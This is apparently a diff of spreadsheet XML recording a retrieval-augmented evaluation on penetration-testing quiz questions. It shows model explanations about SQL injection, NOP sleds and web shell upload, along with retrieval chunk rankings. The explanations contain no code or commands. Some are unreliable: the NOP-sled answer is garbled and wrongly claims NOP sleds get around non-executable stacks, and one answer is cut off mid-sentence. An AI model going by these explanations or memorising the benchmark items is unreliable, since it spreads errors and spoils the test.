+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
@@ -3703,7 +3704,7 @@
       </c>
       <c r="I49" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J49" t="n">
@@ -3711,7 +3712,7 @@
       </c>
       <c r="K49" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3746,7 +3747,7 @@
       <c r="F50" t="inlineStr">
         <is>
           <t>Answer: SQL Injection
-Explanation: SQL Injection would likely be the primary target in this scenario because this vulnerability is specifically relevant to database manipulation and can allow an attacker to execute malicious SQL statements through user input fields. This type of vulnerability occurs when user inputs are not properly sanitized or parameterized, allowing an attacker to inject their own SQL code into the application's queries.</t>
+Explanation: SQL Injection would likely be the primary target in this scenario because this vulnerability is specifically relevant to database manipulation and can allow an attacker to execute malicious SQL statements directly on the database, potentially allowing them to access or modify user data. While Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are also serious security concerns, they focus more on client-side attacks rather than directly affecting the database logic. Buffer Overflow is not typically associated with web application vulnerabilities involving data handling in a database.</t>
         </is>
       </c>
       <c r="G50" t="inlineStr">
@@ -3759,18 +3760,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I50" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J50" t="n">
@@ -3778,7 +3779,7 @@
       </c>
       <c r="K50" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3829,15 +3830,15 @@
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I51" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J51" t="n">
@@ -3845,7 +3846,7 @@
       </c>
       <c r="K51" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3880,7 +3881,7 @@
       <c r="F52" t="inlineStr">
         <is>
           <t>Answer: Use of a NOP sled to guide execution in a buffer overflow attack
-Explanation: The use of a NOP sled to guide execution in a buffer overflow attack is effective in the context of non-executable stack protections because it helps in redirecting the program's execution flow to injected shellcode, typically placed after the NOP sled in an executable heap or other areas not affected by non-executable stack restrictions. 'Shellcode injection in a non-executable stack segment' is not plausible</t>
+Explanation: The use of a NOP sled to guide execution in a buffer overflow attack is effective in the context of non-executable stack protections because it helps in redirecting the program's execution flow to injected shellcode, typically placed after the NOP sled in an executable heap or other areas not affected by non-executable stack restrictions. 'Shellcode injection in a non-executable stack segment' is not plausible because modern OS protections such as NX (No Execute) or DEP (Data Execution Prevention) make this boundary and overwrite adjacent memory locations. The most effective and direct way to exploit this type of vulnerability is through 'stack smashing' which involves corrupting the stack of a program. This often includes altering the function's return address stored in the stack to point to a malicious payload's memory location, hence gaining control of the process's flow. The other listed techniques, such as Denial of Service attack via resource exhaustion and Port scan using a TCP FIN packet do not directly apply to exploiting buffer overflows. They target different aspects of system security (e.g., consuming resources or scanning for open ports), thus making these choices incorrect for directly exploiting a buffer overflow vulnerability discovered in a C program.</t>
         </is>
       </c>
       <c r="G52" t="inlineStr">
@@ -3891,20 +3892,20 @@
       <c r="H52" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I52" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J52" t="n">
@@ -3912,7 +3913,7 @@
       </c>
       <c r="K52" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3960,18 +3961,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I53" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J53" t="n">
@@ -3979,7 +3980,7 @@
       </c>
       <c r="K53" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4014,7 +4015,7 @@
       <c r="F54" t="inlineStr">
         <is>
           <t>Answer: Shell upload via form manipulation
-Explanation: Shell upload via form manipulation is the most viable method for executing arbitrary code on the server. By manipulating the input forms intended for file upload (for example, a profile picture upload feature), an attacker can upload a web shell, which is a malicious script that can be executed on the server. This allows the attacker to execute server-side commands, potentially taking over the server. SQL Injection via email input primarily targets data extraction or database manipulation, not arbitrary code execution on the server. Cross-site Scripting (XSS) using URL parameters targets the client-side browser rather than the server, primarily allowing the attacker to execute script in the context of a user's browser session. Denial of Service (DoS) through malformed packets impacts server availability but does not directly allow arbitrary code execution on the server.</t>
+Explanation: Shell upload via form manipulation is the most viable method for executing arbitrary code on the server. By manipulating the input forms intended for file upload (for example, a profile picture upload feature), an attacker can upload a web shell, which is a malicious script that can be executed on the server. This allows the attacker to execute server-side commands, potentially taking over the server. SQL Injection via email input primarily targets data extraction or database manipulation, not arbitrary code execution on the server. Cross-site Scripting (XSS) using URL parameters targets the client-side browser rather than the server, primarily allowing the attacker to execute script in the context of a user's browser session. Denial of Service (DoS) attacks rather aim</t>
         </is>
       </c>
       <c r="G54" t="inlineStr">
@@ -4026,19 +4027,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: d106a4a8-f9f3-4c71-a034-d800334dd5a3, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I54" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J54" t="n">
@@ -4046,7 +4047,7 @@
       </c>
       <c r="K54" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4094,18 +4095,18 @@
           <t>preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6a01a103-bf85-4482-8ee4-bcd734f51d39, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I55" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J55" t="n">
@@ -4113,7 +4114,7 @@
       </c>
       <c r="K55" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4180,7 +4181,7 @@
       </c>
       <c r="K56" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4231,7 +4232,7 @@
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c0ed16e1-fecd-4bdf-8424-414dcf8f986a, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
@@ -4239,7 +4240,7 @@
       </c>
       <c r="I57" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J57" t="n">
@@ -4247,7 +4248,7 @@
       </c>
       <c r="K57" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4293,20 +4294,20 @@
       <c r="H58" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 265048aa-c862-4da6-ab9b-ec68423cfe22, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I58" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J58" t="n">
@@ -4314,7 +4315,7 @@
       </c>
       <c r="K58" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4381,7 +4382,7 @@
       </c>
       <c r="K59" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4434,13 +4435,13 @@
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I60" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J60" t="n">
@@ -4448,7 +4449,7 @@
       </c>
       <c r="K60" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4494,20 +4495,20 @@
       <c r="H61" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: eb7215a5-fd15-459f-95a3-bdedf78fb5c9, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bc058460-98fa-4086-90cc-12a84379063d, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bc058460-98fa-4086-90cc-12a84379063d, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I61" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J61" t="n">
@@ -4515,7 +4516,7 @@
       </c>
       <c r="K61" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4565,16 +4566,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: dccb08f7-fe77-413c-ad44-e332d37d61b1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ba50b01d-44c3-44e7-a0b6-256236393541, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I62" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J62" t="n">
@@ -4582,7 +4583,7 @@
       </c>
       <c r="K62" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -4629,19 +4630,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 9)
